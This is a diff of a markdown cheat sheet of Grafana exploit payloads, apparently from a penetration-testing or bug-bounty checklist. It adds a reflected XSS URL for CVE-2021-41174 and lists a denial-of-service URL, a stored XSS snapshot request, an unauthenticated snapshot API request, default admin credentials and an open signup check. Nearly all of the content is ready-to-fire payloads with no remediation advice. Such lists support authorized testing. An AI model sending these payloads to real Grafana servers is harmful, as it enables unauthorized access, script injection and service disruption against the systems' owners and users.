1 | 1 | | # Grafana |
2 | | - | 1. CVE-2020-13379 (Denial of Service) |
| 2 | + | 1. CVE-2021-41174 (Reflected XSS) |
| 3 | + | ``` |
| 4 | + | <GRAFANA URL>/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1 |
| 5 | + | ``` |
| 6 | + | 2. CVE-2020-13379 (Denial of Service) |
3 | 7 | | ``` |
4 | 8 | | <GRAFANA URL>/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D |
5 | 9 | | ``` |
6 | | - | 2. CVE-2020-11110 (Stored XSS) |
| 10 | + | 3. CVE-2020-11110 (Stored XSS) |
7 | 11 | | ``` |
8 | 12 | | POST /api/snapshots HTTP/1.1 |
9 | 13 | | Host: <GRAFANA URL> |
| skipped 5 lines |
15 | 19 | | |
16 | 20 | | {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0} |
17 | 21 | | ``` |
18 | | - | 3. CVE-2019-15043 (Grafana Unauthenticated API) |
| 22 | + | 4. CVE-2019-15043 (Grafana Unauthenticated API) |
19 | 23 | | ``` |
20 | 24 | | POST /api/snapshots HTTP/1.1 |
21 | 25 | | Host: <GRAFANA URL> |
| skipped 5 lines |
27 | 31 | | |
28 | 32 | | {"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600} |
29 | 33 | | ``` |
30 | | - | 4. Default Credentials |
| 34 | + | 5. Default Credentials |
31 | 35 | | ``` |
32 | 36 | | Try to login using admin as username and password |
33 | 37 | | ``` |
34 | | - | 5. Signup Enabled |
| 38 | + | 6. Signup Enabled |
35 | 39 | | ``` |
36 | 40 | | <GRAFANA URL>/signup |
37 | 41 | | ``` |